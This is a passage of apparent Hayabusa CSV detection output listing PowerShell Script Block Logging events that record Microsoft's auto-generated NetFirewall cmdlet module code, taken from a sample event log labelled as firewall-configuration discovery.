[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetProtocolPortFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallPortFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""Protocol""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DynamicTransport""> <Type PSType=""NetSecurity.DynamicTransport""/> <RegularQuery> <CmdletParameterMetadata PSName=""DynamicTarget"" CmdletParameterSets=""ByQuery"" Aliases=""DynamicTransport""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByProtocolPort"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByProtocolPort"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""LocalPort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""RemotePort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""IcmpType""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""IcmpType""/> </Parameter> <Parameter ParameterName=""DynamicTransport""> <Type PSType=""NetSecurity.DynamicTransport""/> <CmdletParameterMetadata Aliases=""DynamicTransport"" PSName=""DynamicTarget""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.DynamicTransport"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""Any"" Value=""0""/> <Value Name=""ProximityApps"" Value=""1""/> <Value Name=""ProximitySharing"" Value=""2""/> <Value Name=""WifiDirectPrinting"" Value=""4""/> <Value Name=""WifiDirectDisplay"" Value=""8""/> <Value Name=""WifiDirectDevices"" Value=""16""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
